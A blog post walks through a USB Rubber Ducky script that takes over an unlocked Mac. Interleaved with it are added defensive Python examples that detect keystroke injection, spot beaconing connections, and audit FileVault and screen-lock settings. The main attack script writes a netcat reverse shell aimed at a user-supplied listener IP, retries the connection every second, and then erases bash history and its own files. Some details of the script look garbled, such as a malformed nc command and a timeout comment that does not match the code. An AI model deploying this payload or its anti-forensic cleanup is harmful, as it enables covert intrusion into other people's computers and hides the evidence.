How to PWN a Mac in under 30 Seconds with the USB Rubber Ducky!

 

The USB Rubber Ducky is an HID (Human Interface Device). Basically, it is a programmable keyboard, packaged to look like a USB flash drive, that can type far faster than any human. And what is one major flaw in just about ALL operating systems? They trust the human at the keyboard.
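The "trusts the human" point above is what a defender can turn around: a Ducky types at USB-report rate (DEFAULT_DELAY only pauses between script lines, not between the characters of one STRING), so its keystrokes arrive far closer together than any person's. The following added example, which is not part of the original post or of Hak5's tooling, flags a burst of keystrokes that arrive faster than a human could type. It assumes key-down events are available as (timestamp in seconds, character) pairs, for instance from an input event tap; the event streams, the 60 ms human ceiling and the 8-keystroke burst length are all constructed assumptions for the demonstration.

```python
"""Flag keyboard input that arrives faster than a human can type.

Added example, not part of the original post or of Hak5's tooling. It assumes
key-down events are available as (timestamp_in_seconds, character) pairs, for
example from an input event tap; the events below are constructed.
"""
from statistics import median

# Assumed human ceiling: sustained gaps under ~60 ms between keys are rare
# even for fast typists.
HUMAN_MIN_INTERVAL_S = 0.060
# Consecutive faster-than-human keystrokes required before alerting (assumed).
BURST_LEN = 8


def inter_key_intervals(events):
    """Seconds between successive key-down events."""
    times = [t for t, _ in events]
    return [later - earlier for earlier, later in zip(times, times[1:])]


def longest_fast_burst(events, threshold=HUMAN_MIN_INTERVAL_S):
    """Length in keystrokes of the longest run typed faster than threshold."""
    longest = run = 1
    for gap in inter_key_intervals(events):
        if gap < threshold:
            run += 1
            longest = max(longest, run)
        else:
            run = 1  # a human-speed pause ends the burst
    return longest


def looks_injected(events, burst_len=BURST_LEN):
    """True when burst_len consecutive keystrokes all arrive at scripted speed."""
    return len(events) >= burst_len and longest_fast_burst(events) >= burst_len


def typing_rate(events):
    """Median characters per second, useful to report alongside an alert."""
    gaps = inter_key_intervals(events)
    return 1.0 / median(gaps) if gaps else 0.0


def constructed_events(text, start, interval):
    """Build a constructed event stream typed at a fixed interval."""
    return [(start + i * interval, ch) for i, ch in enumerate(text)]


# Constructed samples: a person typing at ~5 chars/s, then a scripted
# burst at ~250 chars/s, and a stream containing both.
HUMAN = constructed_events("ls -la", 0.0, 0.18)
INJECTED = constructed_events("rm .script.sh", 5.0, 0.004)
MIXED = HUMAN + INJECTED

if __name__ == "__main__":
    for name, stream in (("human", HUMAN), ("injected", INJECTED), ("mixed", MIXED)):
        print(f"{name}: {typing_rate(stream):.0f} chars/s, injected={looks_injected(stream)}")
```

Timing alone is a heuristic: pasted text and some accessibility tools also type quickly, so in practice this signal is combined with the attach event of a new keyboard-class USB device and a short grace period during which the new device's input is blocked until the user confirms it.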

 

There are many pre-written scripts available for Windows, but not many for OS X. I have a Mac, so that is what I generally write payloads for. This specific payload tries to create a reverse shell every second and, after a predetermined amount of time, self-destructs, leaving no evidence behind.

 

You might be thinking, "Isn't there already a reverse shell script for Mac?" Well, yes, but I wasn't satisfied with that one. It only initiates a connection when the computer boots, and it doesn't self-destruct. Mine tries to connect to the host every second. The only downside is that, if the network is being monitored, it will create excessive noise.

NOTE: A solution to this would be to add a "sleep <number of seconds>" to the command the Python loop runs:

os.system("clear; ./.script.sh")

So it would look like this, which would try to initiate a connection every hour:

os.system("sleep 3600; clear; ./.script.sh")
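The "excessive noise" the post admits to is exactly what network monitoring catches, and stretching the interval to an hour does not remove it: a connection attempt that repeats at a fixed interval stands out whether the interval is one second or 3600. The following added example, not part of the original post, runs a simple periodicity check over outbound connection records. The log format is constructed for the example (one line per outbound TCP connection with timestamp, src, dst and dport fields); the regular expression would be adapted to the firewall or flow logs actually available, and the thresholds (five events, 15% spread) are assumptions.

```python
"""Spot fixed-interval outbound connections (beaconing) in connection logs.

Added example, not part of the original post. The log format is constructed
for the example; adapt LINE_RE to the firewall or flow logs you actually have.
The check is interval-based, so a loop that reconnects every second and one
that sleeps for an hour between attempts both stand out.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)"
)


def parse_flows(lines):
    """Group connection timestamps (epoch seconds) by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a connection record
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        flows[(m["src"], m["dst"], int(m["dport"]))].append(ts.timestamp())
    return flows


def interval_stats(times):
    """Return (mean_gap, coefficient_of_variation), or None with too few samples."""
    times = sorted(times)
    gaps = [b - a for a, b in zip(times, times[1:])]
    if len(gaps) < 3:
        return None
    mu = mean(gaps)
    if mu <= 0:
        return None
    return mu, pstdev(gaps) / mu


def find_beacons(lines, min_events=5, max_cv=0.15):
    """Flows with at least min_events connections whose gaps are near-constant.

    max_cv is the tolerated spread of the gaps relative to their mean (assumed
    value); real schedulers jitter a little, so 0 would be too strict.
    """
    hits = []
    for key, times in parse_flows(lines).items():
        if len(times) < min_events:
            continue
        stats = interval_stats(times)
        if stats and stats[1] <= max_cv:
            hits.append({"flow": key, "period_s": round(stats[0]), "cv": round(stats[1], 3)})
    return sorted(hits, key=lambda h: h["flow"])


def constructed_log(src, dst, dport, start, gaps_s):
    """Build constructed log lines: one at start, then one after each gap."""
    t, lines = start, []
    for gap in [0] + list(gaps_s):
        t += timedelta(seconds=gap)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} src={src} dst={dst} dport={dport}")
    return lines


# Constructed sample: a once-a-second loop, an hourly loop, and ordinary
# browsing with irregular gaps. Addresses are documentation ranges.
T0 = datetime(2024, 1, 1, 9, 0, 0)
SAMPLE_LOG = (
    constructed_log("10.0.0.5", "203.0.113.10", 8081, T0, [1] * 9)
    + constructed_log("10.0.0.7", "203.0.113.10", 8081, T0, [3600] * 5)
    + constructed_log("10.0.0.5", "198.51.100.20", 443, T0, [3, 40, 7, 120, 15, 2])
)

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

Both looping flows are reported with their period while the browsing flow, whose gaps vary by more than the mean itself, is not. On a real network the same statistic is computed per flow over a day or more of records, so an hourly cadence accumulates enough samples to be judged.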

 

REM AUTHOR: MICHAEL KETZNER
REM Creates a reverse shell and tries to initiate a connection every second
REM Change 127.0.0.1 to your IP and 8081 to your listening port
REM Change "STRING timeout = time.time() + 18000" change 518000 to the amount of seconds before self-destruction

DELAY 1000
DEFAULT_DELAY 100
COMMAND SPACE
DELAY 300
STRING TERMINAL
DELAY 300
ENTER
DELAY 3000
STRING rm .script.sh
ENTER
STRING touch .script.sh
ENTER
STRING echo "mkfifo foo" > .script.sh
ENTER
STRING echo "nc 127.0.0.1 8081 bin/bash 1>foo" >> .script.sh
ENTER
STRING chmod +rwx .script.sh
ENTER
STRING rm .clear.sh
ENTER
STRING touch .clear.sh
ENTER
STRING echo "open /Applications/Utilities/Terminal.app; sleep 1; osascript -e 'tell application \"System Events\"' -e 'keystroke \"q\" using command down' -e 'end tell'; rm .clear.sh" > .clear.sh;
ENTER
STRING chmod +rwx .clear.sh
ENTER
STRING rm .update.py
ENTER
STRING nano .update.py
ENTER
STRING import os
ENTER
STRING import time
ENTER
STRING timeout = time.time() + 18000
ENTER
STRING while True:
ENTER
STRING     os.system("clear; ./.script.sh")
ENTER
STRING     if time.time() > timeout:
ENTER
STRING         break
ENTER
STRING os.system("rm ~/.bash_history; clear; history -c; clear")
ENTER
STRING os.system("clear")
ENTER
STRING os.system("rm .script.sh; rm .update.py; ./.clear.sh")
ENTER
CTRL O
ENTER
CTRL X
STRING history -c
ENTER
STRING python .update.py
ENTER
COMMAND M
COMMAND H
DELAY 200
COMMAND SPACE
DELAY 200
DELETE
DELAY 200
COMMAND SPACE

Moral of the story: don't leave your Mac unlocked when you leave. But even that can easily be defeated with this Ducky Script. The only way to truly protect your Mac is to use full disk encryption.
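The two controls the post closes on, an automatic screen lock and FileVault, are both things a machine can check for itself. The following added example, not part of the original post, audits them. It parses the output of two real macOS commands: `fdesetup status`, which prints "FileVault is On." or "FileVault is Off.", and `defaults read com.apple.screensaver askForPasswordDelay`, which the example assumes returns the number of seconds of grace before the lock screen demands a password (0 meaning immediately; newer macOS versions may keep this setting elsewhere). The 5-second policy limit and the sample outputs are constructed, so the checks run on any platform; on a Mac the script runs the real commands instead.

```python
"""Check the two controls the post ends on: automatic screen lock and FileVault.

Added example, not part of the original post. It parses the output of two real
macOS commands, `fdesetup status` and `defaults read com.apple.screensaver
askForPasswordDelay` (assumption: seconds before the lock asks for a password).
The sample outputs below are constructed so the checks run on any platform.
"""
import re
import shutil
import subprocess

MAX_LOCK_DELAY_S = 5  # assumed policy: ask for the password within 5 seconds


def filevault_enabled(status_output):
    """True when `fdesetup status` reports that FileVault is On."""
    return re.search(r"FileVault is On", status_output) is not None


def lock_delay_seconds(defaults_output):
    """Parse `defaults read ... askForPasswordDelay`; None if unset or unreadable."""
    m = re.search(r"^\s*(\d+)\s*$", defaults_output, re.MULTILINE)
    return int(m.group(1)) if m else None


def audit(status_output, defaults_output, max_delay=MAX_LOCK_DELAY_S):
    """Return a list of findings; an empty list means both controls look right."""
    findings = []
    if not filevault_enabled(status_output):
        findings.append("FileVault is off: the disk is readable without the login password")
    delay = lock_delay_seconds(defaults_output)
    if delay is None:
        findings.append("screen-lock password delay is not set or could not be read")
    elif delay > max_delay:
        findings.append(f"screen lock waits {delay}s before requiring a password (max {max_delay}s)")
    return findings


def run(cmd):
    """Run a command and return its stdout (empty string if it cannot run)."""
    try:
        return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout
    except OSError:
        return ""


# Constructed sample outputs for a machine with both controls weak.
SAMPLE_FDESETUP = "FileVault is Off.\n"
SAMPLE_DELAY = "300\n"

if __name__ == "__main__":
    if shutil.which("fdesetup"):  # real macOS: query the live settings
        findings = audit(
            run(["fdesetup", "status"]),
            run(["defaults", "read", "com.apple.screensaver", "askForPasswordDelay"]),
        )
    else:  # elsewhere: demonstrate on the constructed outputs
        findings = audit(SAMPLE_FDESETUP, SAMPLE_DELAY)
    print("\n".join(findings) or "both controls in place")
```

Full disk encryption protects the data while the machine is off or locked at the pre-boot stage; the short password delay is what limits the window in which an unattended, already-logged-in session can be used at all.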

 

About Michael David